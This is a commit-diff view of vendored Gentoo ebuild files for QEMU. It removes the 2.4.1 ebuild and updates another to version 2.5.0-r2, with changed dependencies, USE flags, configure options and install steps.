dosym ../vgabios/vgabios-cirrus.bin /usr/share/qemu/vgabios-cirrus.bin
dosym ../vgabios/vgabios-qxl.bin /usr/share/qemu/vgabios-qxl.bin
dosym ../vgabios/vgabios-stdvga.bin /usr/share/qemu/vgabios-stdvga.bin
dosym ../vgabios/vgabios-vmware.bin /usr/share/qemu/vgabios-vmware.bin
fi
# Remove sgabios since we're using the sgabios packaged one
rm "${ED}/usr/share/qemu/sgabios.bin"
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../sgabios/sgabios.bin /usr/share/qemu/sgabios.bin
fi
# Remove iPXE since we're using the iPXE packaged one
rm "${ED}"/usr/share/qemu/pxe-*.rom
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../ipxe/8086100e.rom /usr/share/qemu/pxe-e1000.rom
dosym ../ipxe/80861209.rom /usr/share/qemu/pxe-eepro100.rom
dosym ../ipxe/10500940.rom /usr/share/qemu/pxe-ne2k_pci.rom
dosym ../ipxe/10222000.rom /usr/share/qemu/pxe-pcnet.rom
dosym ../ipxe/10ec8139.rom /usr/share/qemu/pxe-rtl8139.rom
dosym ../ipxe/1af41000.rom /usr/share/qemu/pxe-virtio.rom
fi
fi
qemu_support_kvm && readme.gentoo_create_doc
}
pkg_postinst() {
if qemu_support_kvm; then
readme.gentoo_print_elog
ewarn "Migration from qemu-kvm instances and loading qemu-kvm created"
ewarn "save states has been removed starting with the 1.6.2 release"
ewarn
ewarn "It is recommended that you migrate any VMs that may be running"
ewarn "on qemu-kvm to a host with a newer qemu and regenerate"
ewarn "any saved states with a newer qemu."
ewarn
ewarn "qemu-kvm was the primary qemu provider in Gentoo through 1.2.x"
if use x86 || use amd64; then
ewarn
ewarn "The /usr/bin/kvm and /usr/bin/qemu-kvm wrappers are no longer"
ewarn "installed. In order to use kvm acceleration, pass the flag"
ewarn "-enable-kvm when running your system target."
fi
fi
if [[ -n ${softmmu_targets} ]] && use kernel_linux; then
udev_reload
fi
fcaps cap_net_admin /usr/libexec/qemu-bridge-helper
if use virtfs && [ -n "${softmmu_targets}" ]; then
local virtfs_caps="cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_setgid,cap_mknod,cap_setuid"
fcaps ${virtfs_caps} /usr/bin/virtfs-proxy-helper
fi
}
pkg_info() {
echo "Using:"
echo " $(best_version app-emulation/spice-protocol)"
echo " $(best_version sys-firmware/ipxe)"
echo " $(best_version sys-firmware/seabios)"
if has_version sys-firmware/seabios[binary]; then
echo " USE=binary"
else
echo " USE=''"
fi
echo " $(best_version sys-firmware/vgabios)"
}

642
sdk_container/src/third_party/portage-stable/app-emulation/qemu/qemu-2.4.1.ebuild vendored
View File

@ -1,642 +0,0 @@
# Copyright 1999-2015 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
# $Id$
EAPI=5
PYTHON_COMPAT=( python2_7 )
PYTHON_REQ_USE="ncurses,readline"
inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \
user udev fcaps readme.gentoo pax-utils
BACKPORTS=
if [[ ${PV} = *9999* ]]; then
EGIT_REPO_URI="git://git.qemu.org/qemu.git"
inherit git-2
SRC_URI=""
else
SRC_URI="http://wiki.qemu-project.org/download/${P}.tar.bz2
${BACKPORTS:+
https://dev.gentoo.org/~cardoe/distfiles/${P}-${BACKPORTS}.tar.xz}"
KEYWORDS="~amd64 ~ppc ~ppc64 ~x86 ~x86-fbsd"
fi
DESCRIPTION="QEMU + Kernel-based Virtual Machine userland tools"
HOMEPAGE="http://www.qemu.org http://www.linux-kvm.org"
LICENSE="GPL-2 LGPL-2 BSD-2"
SLOT="0"
IUSE="accessibility +aio alsa bluetooth +caps +curl debug +fdt glusterfs \
gtk gtk2 infiniband iscsi +jpeg \
kernel_linux kernel_FreeBSD lzo ncurses nfs nls numa opengl +pin-upstream-blobs
+png pulseaudio python \
rbd sasl +seccomp sdl sdl2 selinux smartcard snappy spice ssh static static-softmmu
static-user systemtap tci test +threads tls usb usbredir +uuid vde +vhost-net \
virtfs +vnc vte xattr xen xfs"
COMMON_TARGETS="aarch64 alpha arm cris i386 m68k microblaze microblazeel mips
mips64 mips64el mipsel or32 ppc ppc64 s390x sh4 sh4eb sparc sparc64 unicore32
x86_64"
IUSE_SOFTMMU_TARGETS="${COMMON_TARGETS} lm32 moxie ppcemb tricore xtensa xtensaeb"
IUSE_USER_TARGETS="${COMMON_TARGETS} armeb mipsn32 mipsn32el ppc64abi32 ppc64le sparc32plus"
use_softmmu_targets=$(printf ' qemu_softmmu_targets_%s' ${IUSE_SOFTMMU_TARGETS})
use_user_targets=$(printf ' qemu_user_targets_%s' ${IUSE_USER_TARGETS})
IUSE+=" ${use_softmmu_targets} ${use_user_targets}"
# Allow no targets to be built so that people can get a tools-only build.
# Block USE flag configurations known to not work.
REQUIRED_USE="${PYTHON_REQUIRED_USE}
gtk2? ( gtk )
qemu_softmmu_targets_arm? ( fdt )
qemu_softmmu_targets_microblaze? ( fdt )
qemu_softmmu_targets_ppc? ( fdt )
qemu_softmmu_targets_ppc64? ( fdt )
sdl2? ( sdl )
static? ( static-softmmu static-user )
static-softmmu? ( !alsa !pulseaudio !bluetooth !opengl !gtk !gtk2 )
virtfs? ( xattr )
vte? ( gtk )"
# Yep, you need both libcap and libcap-ng since virtfs only uses libcap.
#
# The attr lib isn't always linked in (although the USE flag is always
# respected). This is because qemu supports using the C library's API
# when available rather than always using the extranl library.
COMMON_LIB_DEPEND=">=dev-libs/glib-2.0[static-libs(+)]
sys-libs/zlib[static-libs(+)]
xattr? ( sys-apps/attr[static-libs(+)] )"
SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
>=x11-libs/pixman-0.28.0[static-libs(+)]
accessibility? ( app-accessibility/brltty[static-libs(+)] )
aio? ( dev-libs/libaio[static-libs(+)] )
alsa? ( >=media-libs/alsa-lib-1.0.13 )
bluetooth? ( net-wireless/bluez )
caps? ( sys-libs/libcap-ng[static-libs(+)] )
curl? ( >=net-misc/curl-7.15.4[static-libs(+)] )
fdt? ( >=sys-apps/dtc-1.4.0[static-libs(+)] )
glusterfs? ( >=sys-cluster/glusterfs-3.4.0[static-libs(+)] )
gtk? (
gtk2? (
x11-libs/gtk+:2
vte? ( x11-libs/vte:0 )
)
!gtk2? (
x11-libs/gtk+:3
vte? ( x11-libs/vte:2.90 )
)
)
infiniband? ( sys-infiniband/librdmacm:=[static-libs(+)] )
iscsi? ( net-libs/libiscsi )
jpeg? ( virtual/jpeg:=[static-libs(+)] )
lzo? ( dev-libs/lzo:2[static-libs(+)] )
ncurses? ( sys-libs/ncurses:0=[static-libs(+)] )
nfs? ( >=net-fs/libnfs-1.9.3[static-libs(+)] )
numa? ( sys-process/numactl[static-libs(+)] )
opengl? (
virtual/opengl
media-libs/libepoxy[static-libs(+)]
media-libs/mesa[static-libs(+)]
media-libs/mesa[egl,gles2]
)
png? ( media-libs/libpng:0=[static-libs(+)] )
pulseaudio? ( media-sound/pulseaudio )
rbd? ( sys-cluster/ceph[static-libs(+)] )
sasl? ( dev-libs/cyrus-sasl[static-libs(+)] )
sdl? (
!sdl2? (
media-libs/libsdl[X]
>=media-libs/libsdl-1.2.11[static-libs(+)]
)
sdl2? (
media-libs/libsdl2[X]
media-libs/libsdl2[static-libs(+)]
)
)
seccomp? ( >=sys-libs/libseccomp-2.1.0[static-libs(+)] )
smartcard? ( dev-libs/nss !app-emulation/libcacard )
snappy? ( app-arch/snappy[static-libs(+)] )
spice? (
>=app-emulation/spice-protocol-0.12.3
>=app-emulation/spice-0.12.0[static-libs(+)]
)
ssh? ( >=net-libs/libssh2-1.2.8[static-libs(+)] )
tls? ( net-libs/gnutls[static-libs(+)] )
usb? ( >=virtual/libusb-1-r2[static-libs(+)] )
usbredir? ( >=sys-apps/usbredir-0.6[static-libs(+)] )
uuid? ( >=sys-apps/util-linux-2.16.0[static-libs(+)] )
vde? ( net-misc/vde[static-libs(+)] )
virtfs? ( sys-libs/libcap )
xfs? ( sys-fs/xfsprogs[static-libs(+)] )"
USER_LIB_DEPEND="${COMMON_LIB_DEPEND}"
X86_FIRMWARE_DEPEND="
>=sys-firmware/ipxe-1.0.0_p20130624
pin-upstream-blobs? (
~sys-firmware/seabios-1.8.2
~sys-firmware/sgabios-0.1_pre8
~sys-firmware/vgabios-0.7a
)
!pin-upstream-blobs? (
sys-firmware/seabios
sys-firmware/sgabios
sys-firmware/vgabios
)"
CDEPEND="
!static-softmmu? ( $(printf "%s? ( ${SOFTMMU_LIB_DEPEND//\[static-libs(+)]} ) " ${use_softmmu_targets}) )
!static-user? ( $(printf "%s? ( ${USER_LIB_DEPEND//\[static-libs(+)]} ) " ${use_user_targets}) )
qemu_softmmu_targets_i386? ( ${X86_FIRMWARE_DEPEND} )
qemu_softmmu_targets_x86_64? ( ${X86_FIRMWARE_DEPEND} )
python? ( ${PYTHON_DEPS} )
systemtap? ( dev-util/systemtap )
xen? ( app-emulation/xen-tools )"
DEPEND="${CDEPEND}
dev-lang/perl
=dev-lang/python-2*
sys-apps/texinfo
virtual/pkgconfig
kernel_linux? ( >=sys-kernel/linux-headers-2.6.35 )
gtk? ( nls? ( sys-devel/gettext ) )
static-softmmu? ( $(printf "%s? ( ${SOFTMMU_LIB_DEPEND} ) " ${use_softmmu_targets}) )
static-user? ( $(printf "%s? ( ${USER_LIB_DEPEND} ) " ${use_user_targets}) )
test? (
dev-libs/glib[utils]
sys-devel/bc
)"
RDEPEND="${CDEPEND}
selinux? ( sec-policy/selinux-qemu )
"
STRIP_MASK="/usr/share/qemu/palcode-clipper"
QA_PREBUILT="
usr/share/qemu/openbios-ppc
usr/share/qemu/openbios-sparc64
usr/share/qemu/openbios-sparc32
usr/share/qemu/palcode-clipper
usr/share/qemu/s390-ccw.img
usr/share/qemu/u-boot.e500
"
QA_WX_LOAD="usr/bin/qemu-i386
usr/bin/qemu-x86_64
usr/bin/qemu-alpha
usr/bin/qemu-arm
usr/bin/qemu-cris
usr/bin/qemu-m68k
usr/bin/qemu-microblaze
usr/bin/qemu-microblazeel
usr/bin/qemu-mips
usr/bin/qemu-mipsel
usr/bin/qemu-or32
usr/bin/qemu-ppc
usr/bin/qemu-ppc64
usr/bin/qemu-ppc64abi32
usr/bin/qemu-sh4
usr/bin/qemu-sh4eb
usr/bin/qemu-sparc
usr/bin/qemu-sparc64
usr/bin/qemu-armeb
usr/bin/qemu-sparc32plus
usr/bin/qemu-s390x
usr/bin/qemu-unicore32"
DOC_CONTENTS="If you don't have kvm compiled into the kernel, make sure
you have the kernel module loaded before running kvm. The easiest way to
ensure that the kernel module is loaded is to load it on boot.\n
For AMD CPUs the module is called 'kvm-amd'\n
For Intel CPUs the module is called 'kvm-intel'\n
Please review /etc/conf.d/modules for how to load these\n\n
Make sure your user is in the 'kvm' group\n
Just run 'gpasswd -a <USER> kvm', then have <USER> re-login."
qemu_support_kvm() {
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386 \
use qemu_softmmu_targets_ppc || use qemu_softmmu_targets_ppc64 \
use qemu_softmmu_targets_s390x; then
return 0
fi
return 1
}
pkg_pretend() {
if use kernel_linux && kernel_is lt 2 6 25; then
eerror "This version of KVM requres a host kernel of 2.6.25 or higher."
elif use kernel_linux; then
if ! linux_config_exists; then
eerror "Unable to check your kernel for KVM support"
else
CONFIG_CHECK="~KVM ~TUN ~BRIDGE"
ERROR_KVM="You must enable KVM in your kernel to continue"
ERROR_KVM_AMD="If you have an AMD CPU, you must enable KVM_AMD in"
ERROR_KVM_AMD+=" your kernel configuration."
ERROR_KVM_INTEL="If you have an Intel CPU, you must enable"
ERROR_KVM_INTEL+=" KVM_INTEL in your kernel configuration."
ERROR_TUN="You will need the Universal TUN/TAP driver compiled"
ERROR_TUN+=" into your kernel or loaded as a module to use the"
ERROR_TUN+=" virtual network device if using -net tap."
ERROR_BRIDGE="You will also need support for 802.1d"
ERROR_BRIDGE+=" Ethernet Bridging for some network configurations."
use vhost-net && CONFIG_CHECK+=" ~VHOST_NET"
ERROR_VHOST_NET="You must enable VHOST_NET to have vhost-net"
ERROR_VHOST_NET+=" support"
if use amd64 || use x86 || use amd64-linux || use x86-linux; then
CONFIG_CHECK+=" ~KVM_AMD ~KVM_INTEL"
fi
use python && CONFIG_CHECK+=" ~DEBUG_FS"
ERROR_DEBUG_FS="debugFS support required for kvm_stat"
# Now do the actual checks setup above
check_extra_config
fi
fi
if grep -qs '/usr/bin/qemu-kvm' "${EROOT}"/etc/libvirt/qemu/*.xml; then
eerror "The kvm/qemu-kvm wrappers no longer exist, but your libvirt"
eerror "instances are still pointing to it. Please update your"
eerror "configs in /etc/libvirt/qemu/ to use the -enable-kvm flag"
eerror "and the right system binary (e.g. qemu-system-x86_64)."
die "update your virt configs to not use qemu-kvm"
fi
}
pkg_setup() {
enewgroup kvm 78
}
# Sanity check to make sure target lists are kept up-to-date.
check_targets() {
local var=$1 mak=$2
local detected sorted
pushd "${S}"/default-configs >/dev/null || die
# Force C locale until glibc is updated. #564936
detected=$(echo $(printf '%s\n' *-${mak}.mak | sed "s:-${mak}.mak::" | LC_COLLATE=C sort -u))
sorted=$(echo $(printf '%s\n' ${!var} | LC_COLLATE=C sort -u))
if [[ ${sorted} != "${detected}" ]] ; then
eerror "The ebuild needs to be kept in sync."
eerror "${var}: ${sorted}"
eerror "$(printf '%-*s' ${#var} configure): ${detected}"
die "sync ${var} to the list of targets"
fi
popd >/dev/null
}
src_prepare() {
check_targets IUSE_SOFTMMU_TARGETS softmmu
check_targets IUSE_USER_TARGETS linux-user
# Alter target makefiles to accept CFLAGS set via flag-o
sed -i -r \
-e 's/^(C|OP_C|HELPER_C)FLAGS=/\1FLAGS+=/' \
Makefile Makefile.target || die
# Cheap hack to disable gettext .mo generation.
use nls || rm -f po/*.po
epatch "${FILESDIR}"/qemu-1.7.0-cflags.patch
epatch "${FILESDIR}"/${PN}-2.4-mips-* #563162
[[ -n ${BACKPORTS} ]] && \
EPATCH_FORCE=yes EPATCH_SUFFIX="patch" EPATCH_SOURCE="${S}/patches" \
epatch
# Fix ld and objcopy being called directly
tc-export AR LD OBJCOPY
# Verbose builds
MAKEOPTS+=" V=1"
epatch_user
}
##
# configures qemu based on the build directory and the build type
# we are using.
#
qemu_src_configure() {
debug-print-function ${FUNCNAME} "$@"
local buildtype=$1
local builddir="${S}/${buildtype}-build"
local static_flag="static-${buildtype}"
mkdir "${builddir}"
local conf_opts=(
--prefix=/usr
--sysconfdir=/etc
--libdir=/usr/$(get_libdir)
--docdir=/usr/share/doc/${PF}/html
--disable-bsd-user
--disable-guest-agent
--disable-strip
--disable-werror
--python="${PYTHON}"
--cc="$(tc-getCC)"
--cxx="$(tc-getCXX)"
--host-cc="$(tc-getBUILD_CC)"
$(use_enable debug debug-info)
$(use_enable debug debug-tcg)
--enable-docs
$(use_enable tci tcg-interpreter)
$(use_enable xattr attr)
)
# Disable options not used by user targets as the default configure
# options will autoprobe and try to link in a bunch of unused junk.
conf_softmmu() {
if [[ ${buildtype} == "user" ]] ; then
echo "--disable-${2:-$1}"
else
use_enable "$@"
fi
}
conf_opts+=(
$(conf_softmmu accessibility brlapi)
$(conf_softmmu aio linux-aio)
$(conf_softmmu bluetooth bluez)
$(conf_softmmu caps cap-ng)
$(conf_softmmu curl)
$(conf_softmmu fdt)
$(conf_softmmu glusterfs)
$(conf_softmmu gtk)
$(conf_softmmu infiniband rdma)
$(conf_softmmu iscsi libiscsi)
$(conf_softmmu jpeg vnc-jpeg)
$(conf_softmmu kernel_linux kvm)
$(conf_softmmu lzo)
$(conf_softmmu ncurses curses)
$(conf_softmmu nfs libnfs)
$(conf_softmmu numa)
$(conf_softmmu opengl)
$(conf_softmmu png vnc-png)
$(conf_softmmu rbd)
$(conf_softmmu sasl vnc-sasl)
$(conf_softmmu sdl)
$(conf_softmmu seccomp)
$(conf_softmmu smartcard smartcard-nss)
$(conf_softmmu snappy)
$(conf_softmmu spice)
$(conf_softmmu ssh libssh2)
$(conf_softmmu tls vnc-tls)
$(conf_softmmu usb libusb)
$(conf_softmmu usbredir usb-redir)
$(conf_softmmu uuid)
$(conf_softmmu vde)
$(conf_softmmu vhost-net)
$(conf_softmmu virtfs)
$(conf_softmmu vnc)
$(conf_softmmu vte)
$(conf_softmmu xen)
$(conf_softmmu xen xen-pci-passthrough)
$(conf_softmmu xfs xfsctl)
)
case ${buildtype} in
user)
conf_opts+=(
--enable-linux-user
--disable-system
--disable-blobs
--disable-tools
)
;;
softmmu)
# audio options
local audio_opts="oss"
use alsa && audio_opts="alsa,${audio_opts}"
use sdl && audio_opts="sdl,${audio_opts}"
use pulseaudio && audio_opts="pa,${audio_opts}"
conf_opts+=(
--disable-linux-user
--enable-system
--with-system-pixman
--audio-drv-list="${audio_opts}"
)
use gtk && conf_opts+=( --with-gtkabi=$(usex gtk2 2.0 3.0) )
use sdl && conf_opts+=( --with-sdlabi=$(usex sdl2 2.0 1.2) )
;;
tools)
conf_opts+=(
--disable-linux-user
--disable-system
--disable-blobs
)
static_flag="static"
;;
esac
local targets="${buildtype}_targets"
[[ -n ${targets} ]] && conf_opts+=( --target-list="${!targets}" )
# Add support for SystemTAP
use systemtap && conf_opts+=( --enable-trace-backend=dtrace )
# We always want to attempt to build with PIE support as it results
# in a more secure binary. But it doesn't work with static or if
# the current GCC doesn't have PIE support.
if use ${static_flag}; then
conf_opts+=( --static --disable-pie )
else
gcc-specs-pie && conf_opts+=( --enable-pie )
fi
echo "../configure ${conf_opts[*]}"
cd "${builddir}"
../configure "${conf_opts[@]}" || die "configure failed"
# FreeBSD's kernel does not support QEMU assigning/grabbing
# host USB devices yet
use kernel_FreeBSD && \
sed -i -E -e "s|^(HOST_USB=)bsd|\1stub|" "${S}"/config-host.mak
}
src_configure() {
local target
python_setup
softmmu_targets= softmmu_bins=()
user_targets= user_bins=()
for target in ${IUSE_SOFTMMU_TARGETS} ; do
if use "qemu_softmmu_targets_${target}"; then
softmmu_targets+=",${target}-softmmu"
softmmu_bins+=( "qemu-system-${target}" )
fi
done
for target in ${IUSE_USER_TARGETS} ; do
if use "qemu_user_targets_${target}"; then
user_targets+=",${target}-linux-user"
user_bins+=( "qemu-${target}" )
fi
done
softmmu_targets=${softmmu_targets#,}
user_targets=${user_targets#,}
[[ -n ${softmmu_targets} ]] && qemu_src_configure "softmmu"
[[ -n ${user_targets} ]] && qemu_src_configure "user"
[[ -z ${softmmu_targets}${user_targets} ]] && qemu_src_configure "tools"
}
src_compile() {
if [[ -n ${user_targets} ]]; then
cd "${S}/user-build"
default
fi
if [[ -n ${softmmu_targets} ]]; then
cd "${S}/softmmu-build"
default
fi
if [[ -z ${softmmu_targets}${user_targets} ]]; then
cd "${S}/tools-build"
default
fi
}
src_test() {
if [[ -n ${softmmu_targets} ]]; then
cd "${S}/softmmu-build"
pax-mark m */qemu-system-* #515550
emake -j1 check
emake -j1 check-report.html
fi
}
qemu_python_install() {
python_domodule "${S}/scripts/qmp/qmp.py"
python_doscript "${S}/scripts/kvm/kvm_stat"
python_doscript "${S}/scripts/kvm/vmxcap"
python_doscript "${S}/scripts/qmp/qmp-shell"
python_doscript "${S}/scripts/qmp/qemu-ga-client"
}
src_install() {
if [[ -n ${user_targets} ]]; then
cd "${S}/user-build"
emake DESTDIR="${ED}" install
# Install binfmt handler init script for user targets
newinitd "${FILESDIR}/qemu-binfmt.initd-r1" qemu-binfmt
fi
if [[ -n ${softmmu_targets} ]]; then
cd "${S}/softmmu-build"
emake DESTDIR="${ED}" install
# This might not exist if the test failed. #512010
[[ -e check-report.html ]] && dohtml check-report.html
if use kernel_linux; then
udev_dorules "${FILESDIR}"/65-kvm.rules
fi
if use python; then
python_foreach_impl qemu_python_install
fi
fi
if [[ -z ${softmmu_targets}${user_targets} ]]; then
cd "${S}/tools-build"
emake DESTDIR="${ED}" install
fi
# Disable mprotect on the qemu binaries as they use JITs to be fast #459348
pushd "${ED}"/usr/bin >/dev/null
pax-mark m "${softmmu_bins[@]}" "${user_bins[@]}"
popd >/dev/null
# Install config file example for qemu-bridge-helper
insinto "/etc/qemu"
doins "${FILESDIR}/bridge.conf"
# Remove the docdir placed qmp-commands.txt
mv "${ED}/usr/share/doc/${PF}/html/qmp-commands.txt" "${S}/docs/qmp/"
cd "${S}"
dodoc Changelog MAINTAINERS docs/specs/pci-ids.txt
newdoc pc-bios/README README.pc-bios
dodoc docs/qmp/*.txt
if [[ -n ${softmmu_targets} ]]; then
# Remove SeaBIOS since we're using the SeaBIOS packaged one
rm "${ED}/usr/share/qemu/bios.bin"
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../seabios/bios.bin /usr/share/qemu/bios.bin
fi
# Remove vgabios since we're using the vgabios packaged one
rm "${ED}/usr/share/qemu/vgabios.bin"
rm "${ED}/usr/share/qemu/vgabios-cirrus.bin"
rm "${ED}/usr/share/qemu/vgabios-qxl.bin"
rm "${ED}/usr/share/qemu/vgabios-stdvga.bin"
rm "${ED}/usr/share/qemu/vgabios-vmware.bin"
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../vgabios/vgabios.bin /usr/share/qemu/vgabios.bin
dosym ../vgabios/vgabios-cirrus.bin /usr/share/qemu/vgabios-cirrus.bin
dosym ../vgabios/vgabios-qxl.bin /usr/share/qemu/vgabios-qxl.bin
dosym ../vgabios/vgabios-stdvga.bin /usr/share/qemu/vgabios-stdvga.bin
dosym ../vgabios/vgabios-vmware.bin /usr/share/qemu/vgabios-vmware.bin
fi
# Remove sgabios since we're using the sgabios packaged one
rm "${ED}/usr/share/qemu/sgabios.bin"
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../sgabios/sgabios.bin /usr/share/qemu/sgabios.bin
fi
# Remove iPXE since we're using the iPXE packaged one
rm "${ED}"/usr/share/qemu/pxe-*.rom
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../ipxe/8086100e.rom /usr/share/qemu/pxe-e1000.rom
dosym ../ipxe/80861209.rom /usr/share/qemu/pxe-eepro100.rom
dosym ../ipxe/10500940.rom /usr/share/qemu/pxe-ne2k_pci.rom
dosym ../ipxe/10222000.rom /usr/share/qemu/pxe-pcnet.rom
dosym ../ipxe/10ec8139.rom /usr/share/qemu/pxe-rtl8139.rom
dosym ../ipxe/1af41000.rom /usr/share/qemu/pxe-virtio.rom
fi
fi
qemu_support_kvm && readme.gentoo_create_doc
}
pkg_postinst() {
if qemu_support_kvm; then
readme.gentoo_print_elog
fi
if [[ -n ${softmmu_targets} ]] && use kernel_linux; then
udev_reload
fi
fcaps cap_net_admin /usr/libexec/qemu-bridge-helper
if use virtfs && [ -n "${softmmu_targets}" ]; then
local virtfs_caps="cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_setgid,cap_mknod,cap_setuid"
fcaps ${virtfs_caps} /usr/bin/virtfs-proxy-helper
fi
}
pkg_info() {
echo "Using:"
echo " $(best_version app-emulation/spice-protocol)"
echo " $(best_version sys-firmware/ipxe)"
echo " $(best_version sys-firmware/seabios)"
if has_version 'sys-firmware/seabios[binary]'; then
echo " USE=binary"
else
echo " USE=''"
fi
echo " $(best_version sys-firmware/vgabios)"
}

100
sdk_container/src/third_party/portage-stable/app-emulation/qemu/qemu-2.4.0-r1.ebuild → sdk_container/src/third_party/portage-stable/app-emulation/qemu/qemu-2.5.0-r2.ebuild vendored
View File

@ -1,4 +1,4 @@
# Copyright 1999-2015 Gentoo Foundation # Copyright 1999-2016 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2 # Distributed under the terms of the GNU General Public License v2
# $Id$ # $Id$
@ -7,8 +7,10 @@ EAPI=5
PYTHON_COMPAT=( python2_7 ) PYTHON_COMPAT=( python2_7 )
PYTHON_REQ_USE="ncurses,readline" PYTHON_REQ_USE="ncurses,readline"
PLOCALES="de_DE fr_FR hu it tr zh_CN"
inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \ inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \
user udev fcaps readme.gentoo pax-utils user udev fcaps readme.gentoo pax-utils l10n
BACKPORTS= BACKPORTS=
@ -20,7 +22,7 @@ else
SRC_URI="http://wiki.qemu-project.org/download/${P}.tar.bz2 SRC_URI="http://wiki.qemu-project.org/download/${P}.tar.bz2
${BACKPORTS:+ ${BACKPORTS:+
https://dev.gentoo.org/~cardoe/distfiles/${P}-${BACKPORTS}.tar.xz}" https://dev.gentoo.org/~cardoe/distfiles/${P}-${BACKPORTS}.tar.xz}"
KEYWORDS="amd64 ~ppc ~ppc64 x86 ~x86-fbsd" KEYWORDS="amd64 ~arm64 ~ppc ~ppc64 x86 ~x86-fbsd"
fi fi
DESCRIPTION="QEMU + Kernel-based Virtual Machine userland tools" DESCRIPTION="QEMU + Kernel-based Virtual Machine userland tools"
@ -29,18 +31,18 @@ HOMEPAGE="http://www.qemu.org http://www.linux-kvm.org"
LICENSE="GPL-2 LGPL-2 BSD-2" LICENSE="GPL-2 LGPL-2 BSD-2"
SLOT="0" SLOT="0"
IUSE="accessibility +aio alsa bluetooth +caps +curl debug +fdt glusterfs \ IUSE="accessibility +aio alsa bluetooth +caps +curl debug +fdt glusterfs \
gtk gtk2 infiniband iscsi +jpeg \ gnutls gtk gtk2 infiniband iscsi +jpeg \
kernel_linux kernel_FreeBSD lzo ncurses nfs nls numa opengl +pin-upstream-blobs kernel_linux kernel_FreeBSD lzo ncurses nfs nls numa opengl +pin-upstream-blobs
+png pulseaudio python \ +png pulseaudio python \
rbd sasl +seccomp sdl sdl2 selinux smartcard snappy spice ssh static static-softmmu rbd sasl +seccomp sdl sdl2 selinux smartcard snappy spice ssh static static-softmmu
static-user systemtap tci test +threads tls usb usbredir +uuid vde +vhost-net \ static-user systemtap tci test +threads usb usbredir +uuid vde +vhost-net \
virtfs +vnc vte xattr xen xfs" virgl virtfs +vnc vte xattr xen xfs"
COMMON_TARGETS="aarch64 alpha arm cris i386 m68k microblaze microblazeel mips COMMON_TARGETS="aarch64 alpha arm cris i386 m68k microblaze microblazeel mips
mips64 mips64el mipsel or32 ppc ppc64 s390x sh4 sh4eb sparc sparc64 unicore32 mips64 mips64el mipsel or32 ppc ppc64 s390x sh4 sh4eb sparc sparc64 unicore32
x86_64" x86_64"
IUSE_SOFTMMU_TARGETS="${COMMON_TARGETS} lm32 moxie ppcemb tricore xtensa xtensaeb" IUSE_SOFTMMU_TARGETS="${COMMON_TARGETS} lm32 moxie ppcemb tricore xtensa xtensaeb"
IUSE_USER_TARGETS="${COMMON_TARGETS} armeb mipsn32 mipsn32el ppc64abi32 ppc64le sparc32plus" IUSE_USER_TARGETS="${COMMON_TARGETS} armeb mipsn32 mipsn32el ppc64abi32 ppc64le sparc32plus tilegx"
use_softmmu_targets=$(printf ' qemu_softmmu_targets_%s' ${IUSE_SOFTMMU_TARGETS}) use_softmmu_targets=$(printf ' qemu_softmmu_targets_%s' ${IUSE_SOFTMMU_TARGETS})
use_user_targets=$(printf ' qemu_user_targets_%s' ${IUSE_USER_TARGETS}) use_user_targets=$(printf ' qemu_user_targets_%s' ${IUSE_USER_TARGETS})
@ -65,6 +67,9 @@ REQUIRED_USE="${PYTHON_REQUIRED_USE}
# The attr lib isn't always linked in (although the USE flag is always # The attr lib isn't always linked in (although the USE flag is always
# respected). This is because qemu supports using the C library's API # respected). This is because qemu supports using the C library's API
# when available rather than always using the extranl library. # when available rather than always using the extranl library.
#
# Older versions of gnutls are supported, but it's simpler to just require
# the latest versions. This is also why we require nettle.
COMMON_LIB_DEPEND=">=dev-libs/glib-2.0[static-libs(+)] COMMON_LIB_DEPEND=">=dev-libs/glib-2.0[static-libs(+)]
sys-libs/zlib[static-libs(+)] sys-libs/zlib[static-libs(+)]
xattr? ( sys-apps/attr[static-libs(+)] )" xattr? ( sys-apps/attr[static-libs(+)] )"
@ -78,6 +83,10 @@ SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
curl? ( >=net-misc/curl-7.15.4[static-libs(+)] ) curl? ( >=net-misc/curl-7.15.4[static-libs(+)] )
fdt? ( >=sys-apps/dtc-1.4.0[static-libs(+)] ) fdt? ( >=sys-apps/dtc-1.4.0[static-libs(+)] )
glusterfs? ( >=sys-cluster/glusterfs-3.4.0[static-libs(+)] ) glusterfs? ( >=sys-cluster/glusterfs-3.4.0[static-libs(+)] )
gnutls? (
dev-libs/nettle[static-libs(+)]
>=net-libs/gnutls-3.0[static-libs(+)]
)
gtk? ( gtk? (
gtk2? ( gtk2? (
x11-libs/gtk+:2 x11-libs/gtk+:2
@ -116,18 +125,18 @@ SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
) )
) )
seccomp? ( >=sys-libs/libseccomp-2.1.0[static-libs(+)] ) seccomp? ( >=sys-libs/libseccomp-2.1.0[static-libs(+)] )
smartcard? ( dev-libs/nss !app-emulation/libcacard ) smartcard? ( >=app-emulation/libcacard-2.5.0[static-libs(+)] )
snappy? ( app-arch/snappy[static-libs(+)] ) snappy? ( app-arch/snappy[static-libs(+)] )
spice? ( spice? (
>=app-emulation/spice-protocol-0.12.3 >=app-emulation/spice-protocol-0.12.3
>=app-emulation/spice-0.12.0[static-libs(+)] >=app-emulation/spice-0.12.0[static-libs(+)]
) )
ssh? ( >=net-libs/libssh2-1.2.8[static-libs(+)] ) ssh? ( >=net-libs/libssh2-1.2.8[static-libs(+)] )
tls? ( net-libs/gnutls[static-libs(+)] )
usb? ( >=virtual/libusb-1-r2[static-libs(+)] ) usb? ( >=virtual/libusb-1-r2[static-libs(+)] )
